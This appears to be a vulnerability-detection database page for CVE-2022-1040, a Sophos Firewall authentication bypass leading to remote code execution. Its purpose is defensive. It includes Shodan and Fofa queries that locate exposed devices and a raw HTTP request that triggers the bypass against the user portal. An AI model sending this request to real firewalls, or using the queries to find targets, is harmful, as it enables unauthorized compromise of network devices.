🔙 목록으로 돌아가기

CVE-2022-1040: Sophos Firewall <=18.5 MR3 - Remote Code Execution

TitleSophos Firewall <=18.5 MR3 - Remote Code Execution
AuthorFor3stCo1d
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the firewall.
RemediationUpgrade to a patched version of Sophos Firewall (>=18.5 MR4) to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94439
CVE IDCVE-2022-1040
CWE IDCWE-287
Shodan Queryhttp.title:"Sophos"http.title:"sophos"
Fofa Querytitle="sophos"
Tags cve cve2022 sophos firewall auth-bypass rce kev vkev vuln

🔍 Vulnerability Description

Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code.

🌐 HTTP Request

POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Content-Length: 0
Accept: */*
Accept-Language: en
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1040.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1040.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A